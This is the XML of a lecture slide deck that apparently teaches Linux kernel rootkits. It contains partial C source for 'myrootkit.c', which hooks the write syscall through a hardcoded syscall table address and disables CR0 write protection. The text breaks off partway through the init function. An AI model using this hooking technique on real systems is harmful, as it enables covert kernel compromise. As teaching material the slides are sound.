                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>module.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>kernel.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>errno.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>unistd.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>MODULE_LICENSE("GPL");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>MODULE_AUTHOR("Your name here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>unsigned long *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>syscall_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>= (unsigned long *) 0xffffffff81801400;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>asmlinkage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> long (*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>original_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>)(unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> char __user *, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>asmlinkage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>new_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> char __user *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> count) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>   // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>hijacked write </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>printk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(KERN_ALERT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>pwnd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>"); </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>original_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, count); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="796348687"/>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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Why does Greg know all of this stuff about kernel rootkits?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Is he a government spy?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Secret agent?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>James Bond?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3522191469"/>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8901"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>myrootkit.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="144684" y="1024099"/>
            <a:ext cx="8854632" cy="5755422"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>tatic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>init_rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(void) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>printk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(KERN_ALERT “Entering the kernel!\n”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> // disable write protection, flip bit 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>  write_cr0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(read_cr0 () &amp; (~ 0x10000)); </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>original_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
